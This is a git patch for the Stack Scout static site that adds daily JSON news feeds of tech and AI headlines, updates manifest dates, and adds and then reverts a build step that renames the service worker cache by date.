government agencies access to its specialized GPT-Rosalind modelThe initiative focuses on defending against engineered pathogens.", + "url": "https://www.digg.com/ai/dl0e6ofa", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.024Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7", + "url": "https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.014Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold", + "url": "https://x.com/Mho_23/status/2048507307466658062", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-29T12:05:45.033Z", + "summary": "AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation.", + "category": "ai_tools" + }, + { + "title": "Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption", + "url": "https://x.com/garrytan/status/2052434681363321056", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-29T12:02:13.220Z", + "summary": "Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. 
The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-30.json b/data/news-feed-2026-05-30.json new file mode 100644 index 0000000..3ec9f9e --- /dev/null +++ b/data/news-feed-2026-05-30.json @@ -0,0 +1,243 @@ +{ + "generated": "2026-06-05T00:44:44.837Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-30", + "article_count": 15, + "archived_story_count": 214, + "articles": [ + { + "title": "Show HN: VT Code – open-source terminal coding agent in Rust", + "url": "https://github.com/vinhnx/VTCode", + "source": "Hacker News", + "tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "importance": 0.82, + "date": "2026-05-30T03:07:25.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devicesA new profile interface tracks token activity and usage statistics.", + "url": "https://www.digg.com/ai/2cvxmdwh", + "source": "Digg AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.453Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399", + "url": "https://ouraring.com/blog/oura-ring-5", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-29T23:40:17.517Z", + "summary": "Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. 
New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399.", + "category": "ai_tools" + }, + { + "title": "Cursor Releases Developer Habits Report on AI Coding Trends", + "url": "https://www.digg.com/ai/6jh7d90b", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.474Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking", + "url": "https://www.digg.com/ai/9jzt6gwc", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.461Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Shift Launches Free NYC Cleaning to Gather Robotics Training Data", + "url": "https://www.digg.com/ai/5ol0wuf6", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.459Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing", + "url": "https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T23:40:17.517Z", + "summary": "Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation.", + "category": "ai_tools" + }, + { + "title": "Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes 
Enterprise AI Cost Controls Gap", + "url": "https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-29T23:37:37.979Z", + "summary": "An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk.", + "category": "ai_tools" + }, + { + "title": "Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'", + "url": "https://x.com/jarredsumner/status/2060XXX", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T23:37:37.979Z", + "summary": "Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' 
The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing.", + "category": "ai_tools" + }, + { + "title": "wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack", + "url": "https://github.com/wolfSSL/wolfCOSE", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9400000000000001, + "date": "2026-05-30T20:42:28.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenAI Extends Codex Computer Use To Windows", + "url": "https://www.digg.com/ai/24n5kcme", + "source": "Digg AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.94, + "date": "2026-05-30T05:18:16.464Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data", + "url": "https://www.digg.com/ai/hqutws0i", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.94, + "date": "2026-05-30T05:18:16.456Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Kore: Binary File Format Optimized for Modern Data Systems (Open Source)", + "url": "https://github.com/arunkatherashala/Kore", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8899999999999999, + "date": "2026-05-30T20:54:22.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "ChatGPT — Release Notes", + "url": "https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.", + "source": "The Verge AI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.76, + "date": 
"2026-05-30T05:18:42.413Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Show HN: Open Envelope – an open schema for defining AI agent teams", + "url": "https://openenvelope.org/docs/schema/", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.75, + "date": "2026-05-28T20:30:20.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-31.json b/data/news-feed-2026-05-31.json new file mode 100644 index 0000000..8ba62ae --- /dev/null +++ b/data/news-feed-2026-05-31.json @@ -0,0 +1,25 @@ +{ + "generated": "2026-06-05T00:44:45.119Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-31", + "article_count": 1, + "archived_story_count": 98, + "articles": [ + { + "title": "Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal", + "url": "https://github.com/marekkowalczyk/breathe-cli", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7699999999999999, + "date": "2026-05-30T20:30:53.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-01.json b/data/news-feed-2026-06-01.json new file mode 100644 index 0000000..08dc6f1 --- /dev/null +++ b/data/news-feed-2026-06-01.json @@ -0,0 +1,85 @@ +{ + "generated": "2026-06-05T00:44:45.419Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-06-01", + "article_count": 5, + "archived_story_count": 220, + "articles": [ + { + "title": "Nvidia announces new AI chip for personal computers", + "url": "https://www.bbc.com/news/articles/crmp9mppvzro", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-06-01T10:33:25.000Z", + "summary": null, + "category": "tech_general" + }, + 
{ + "title": "AI Agent Guidelines for CS336 at Stanford", + "url": "https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.91, + "date": "2026-06-01T16:41:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenAI frontier models and Codex are now available on AWS", + "url": "https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.83, + "date": "2026-06-01T21:50:02.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Malicious npm packages detected across Red Hat Cloud Services", + "url": "https://github.com/RedHatInsights/javascript-clients/issues/492", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.83, + "date": "2026-06-01T13:30:21.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Movwin: My (Unpublished) TUI Framework", + "url": "https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7699999999999999, + "date": "2026-05-30T01:07:42.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-02.json b/data/news-feed-2026-06-02.json new file mode 100644 index 0000000..48cbc39 --- /dev/null +++ b/data/news-feed-2026-06-02.json @@ -0,0 +1,72 @@ +{ + "generated": "2026-06-05T00:44:45.626Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-06-02", + "article_count": 4, + "archived_story_count": 241, + "articles": [ + { + "title": "Microsoft announces Scout, an autonomous AI agent built on OpenClaw", + "url": 
"https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html", + "source": "Hacker News", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-06-02T18:19:27.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Alphabet announces $80B equity capital raise to expand AI infra and compute", + "url": "https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-06-01T20:55:15.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "HP re-releases classic computer science calculator: The HP-16C", + "url": "https://hpcalcs.com/product/hp-16c-collectors-edition/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9400000000000001, + "date": "2026-06-02T19:02:40.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Apple rejected my dictation app for using the accessibility API", + "url": "https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.86, + "date": "2026-06-02T12:00:03.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-03.json b/data/news-feed-2026-06-03.json new file mode 100644 index 0000000..473709d --- /dev/null +++ b/data/news-feed-2026-06-03.json @@ -0,0 +1,102 @@ +{ + "generated": "2026-06-05T00:44:45.899Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-06-03", + 
"article_count": 6, + "archived_story_count": 269, + "articles": [ + { + "title": "Ableton Extensions SDK", + "url": "https://www.ableton.com/en/live/extensions/", + "source": "Hacker News", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.8200000000000001, + "date": "2026-06-03T20:39:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Gooey: A GPU-accelerated UI framework for Zig", + "url": "https://github.com/duanebester/gooey", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-06-03T17:12:27.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Capstone – multi-platform, multi-architecture disassembly framework", + "url": "https://www.capstone-engine.org/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-06-03T01:59:46.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers", + "url": "https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8899999999999999, + "date": "2026-06-03T17:01:00.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Roku LT Operating System open source distribution", + "url": "https://blog.roku.com/developer/roku-lt-os", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.86, + "date": "2026-06-03T01:13:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Journey to JPEG XL: open-source experiments shaped the future of image 
coding", + "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6599999999999999, + "date": "2026-06-03T21:55:23.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-04.json b/data/news-feed-2026-06-04.json new file mode 100644 index 0000000..2931428 --- /dev/null +++ b/data/news-feed-2026-06-04.json @@ -0,0 +1,86 @@ +{ + "generated": "2026-06-04T21:49:41.031Z", + "site": "Stack Scout", + "article_count": 5, + "articles": [ + { + "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", + "url": "https://github.com/anthropics/defending-code-reference-harness", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-04T20:11:20.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Ableton Extensions SDK", + "url": "https://www.ableton.com/en/live/extensions/", + "source": "Hacker News", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-03T20:39:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Open Terminal – A Bloomberg Style App for Research", + "url": "https://tesseractanalytics.ai/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-04T15:58:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Meta's ships facial recognition on smart glasses", + "url": "https://www.buchodi.com/meta-glasses-facial-recognition/", + 
"source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.48, + "date": "2026-06-04T19:36:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Journey to JPEG XL: open-source experiments shaped the future of image coding", + "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.48, + "date": "2026-06-03T21:55:23.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-05.json b/data/news-feed-2026-06-05.json new file mode 100644 index 0000000..32afd3d --- /dev/null +++ b/data/news-feed-2026-06-05.json @@ -0,0 +1,84 @@ +{ + "generated": "2026-06-05T17:45:11.045Z", + "site": "Stack Scout", + "article_count": 5, + "articles": [ + { + "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", + "url": "https://github.com/anthropics/defending-code-reference-harness", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-04T20:11:20.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Open Code Review – An AI-powered code review CLI tool", + "url": "https://github.com/alibaba/open-code-review", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.48, + "date": "2026-06-05T00:04:29.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Meta's ships facial recognition on smart glasses", + "url": "https://www.buchodi.com/meta-glasses-facial-recognition/", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + 
"tool_update" + ], + "importance": 0.48, + "date": "2026-06-04T19:36:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "databow: a Rust CLI to query any database with an ADBC driver", + "url": "https://columnar.tech/blog/introducing-databow//", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.48, + "date": "2026-06-02T23:11:13.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Branchless Quicksort faster than std:sort and pdqsort with C and C++ API", + "url": "https://tiki.li/blog/blqsort", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.48, + "date": "2026-06-02T20:00:54.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-06.json b/data/news-feed-2026-06-06.json new file mode 100644 index 0000000..842deea --- /dev/null +++ b/data/news-feed-2026-06-06.json @@ -0,0 +1,6 @@ +{ + "generated": "2026-06-06T12:00:13.600Z", + "site": "Stack Scout", + "article_count": 0, + "articles": [] +} \ No newline at end of file diff --git a/data/news-feed-latest.json b/data/news-feed-latest.json new file mode 100644 index 0000000..842deea --- /dev/null +++ b/data/news-feed-latest.json @@ -0,0 +1,6 @@ +{ + "generated": "2026-06-06T12:00:13.600Z", + "site": "Stack Scout", + "article_count": 0, + "articles": [] +} \ No newline at end of file diff --git a/data/page-registry.json b/data/page-registry.json index 33a29ae..b3cacce 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-06-04", + "generatedAt": "2026-06-06", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 7d7a77b..29ddbed 100644 --- a/data/radar-manifest.json +++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack 
Scout // Radar", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index dee2917..8074788 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 779cf1b..21ac358 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index ec7781b..7805e61 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

          From the Stack Scout Lab

          diff --git a/method/index.html b/method/index.html index aa83e0d..6a0e17f 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

          Verdict language

          diff --git a/radar/index.html b/radar/index.html index 4bc907f..cbc054e 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

          GitHub skills ecosystem

          diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index d390a74..e4a6b8a 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -1273,6 +1273,21 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo ` } +function updateServiceWorkerCacheName() { + const serviceWorkerPath = 'service-worker.js' + const current = fs.readFileSync(path.join(ROOT_DIR, serviceWorkerPath), 'utf8') + const next = current.replace( + /const CACHE_NAME = ['"]stackscout-\d{4}-\d{2}-\d{2}['"]/, + `const CACHE_NAME = 'stackscout-${GENERATED_AT}'`, + ) + + if (next === current) { + throw new Error('service-worker.js cache name was not updated; expected stackscout-YYYY-MM-DD declaration.') + } + + writeFile(serviceWorkerPath, next) +} + function main() { const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') @@ -1333,6 +1348,7 @@ function main() { ] writeFile('sitemap.xml', buildSitemap(sitemapRoutes)) + updateServiceWorkerCacheName() console.log( `Stack Scout build complete. Generated ${tools.length} tool pages, ${categories.length} category pages, and ${updates.length} updates.`, ) diff --git a/service-worker.js b/service-worker.js index 9ff0fb2..65ca957 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-06-04' +const CACHE_NAME = 'stackscout-2026-06-06' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index 9274b4a..de44888 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

          n8n

          diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index a333ebe..d247d4c 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

          SyncPad

          diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index 3206296..f810be3 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

          Wrangler

          diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index cedcfb4..34f46cc 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

          Wrangler

          diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 8e6dee2..437555c 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

          GitHub MCP Server

          diff --git a/tools/make/index.html b/tools/make/index.html index cb9981e..157e8cc 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

          Anthropic API

          diff --git a/tools/n8n/index.html b/tools/n8n/index.html index 2b209f0..e546569 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

          Anthropic API

          diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index b5b70ae..b717fbb 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

          Playwright MCP

          diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index 226bd85..cc49f23 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

          OpenAI API

          diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index d2b6b07..59e65bd 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

          Anthropic API

          diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index df9fb37..546b067 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

          Strudel Studio

          diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index dbd10d1..0d7dbc5 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

          OpenAI API

          diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index a5b9964..741d63b 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

          Canvas Planner

          diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 2bf1dc5..32cd6f1 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

          Playwright MCP

          diff --git a/updates/index.html b/updates/index.html index a824e2d..63d8716 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

          Wrangler 4.58.0 improved command grouping and auth ergonomics

          From 64558b507fce2ea18213af371e03b9b6ebbbc6d7 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:41:53 +0100 Subject: [PATCH 4/5] Revert "fix: refresh service worker cache during build" This reverts commit 52fed771d49f5337a14e3256f26d97ce92a0243b. --- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 +- data/collections-manifest.json | 4 +- data/digest-2026-03-15.md | 23 --- data/digest-2026-03-16.md | 53 ------ data/digest-2026-03-17.md | 107 ----------- data/digest-2026-03-18.md | 71 -------- data/digest-2026-03-19.md | 39 ---- data/digest-2026-03-20.md | 45 ----- data/digest-2026-03-21.md | 49 ----- data/digest-2026-03-22.md | 49 ----- data/digest-2026-03-23.md | 25 --- data/digest-2026-03-24.md | 65 ------- data/digest-2026-03-25.md | 53 ------ data/digest-2026-03-26.md | 51 ------ data/digest-2026-03-27.md | 35 ---- data/digest-2026-03-28.md | 29 --- data/digest-2026-03-29.md | 23 --- data/digest-2026-03-30.md | 19 -- data/digest-2026-03-31.md | 125 ------------- data/digest-2026-04-01.md | 95 ---------- data/digest-2026-04-02.md | 71 -------- data/digest-2026-04-03.md | 47 ----- data/digest-2026-04-04.md | 39 ---- data/digest-2026-04-05.md | 125 ------------- data/digest-2026-04-06.md | 119 ------------ data/digest-2026-04-07.md | 125 ------------- data/digest-2026-04-08.md | 125 ------------- data/digest-2026-04-09.md | 123 ------------- data/digest-2026-04-10.md | 123 ------------- data/digest-2026-04-11.md | 125 ------------- data/digest-2026-04-12.md | 83 --------- data/digest-2026-04-14.md | 125 ------------- data/digest-2026-04-15.md | 125 ------------- data/digest-2026-04-16.md | 123 ------------- 
data/digest-2026-04-17.md | 123 ------------- data/digest-2026-04-18.md | 125 ------------- data/digest-2026-04-19.md | 119 ------------ data/digest-2026-04-20.md | 123 ------------- data/digest-2026-04-21.md | 126 ------------- data/digest-2026-04-22.md | 117 ------------ data/digest-2026-04-23.md | 103 ----------- data/digest-2026-04-25.md | 125 ------------- data/digest-2026-04-26.md | 127 ------------- data/digest-2026-04-27.md | 125 ------------- data/digest-2026-04-28.md | 123 ------------- data/digest-2026-04-29.md | 125 ------------- data/digest-2026-04-30.md | 117 ------------ data/digest-2026-05-01.md | 123 ------------- data/digest-2026-05-02.md | 125 ------------- data/digest-2026-05-03.md | 123 ------------- data/digest-2026-05-04.md | 125 ------------- data/digest-2026-05-05.md | 125 ------------- data/digest-2026-05-06.md | 123 ------------- data/digest-2026-05-07.md | 123 ------------- data/digest-2026-05-08.md | 125 ------------- data/digest-2026-05-09.md | 123 ------------- data/digest-2026-05-10.md | 125 ------------- data/digest-2026-05-11.md | 123 ------------- data/digest-2026-05-12.md | 125 ------------- data/digest-2026-05-13.md | 125 ------------- data/digest-2026-05-14.md | 125 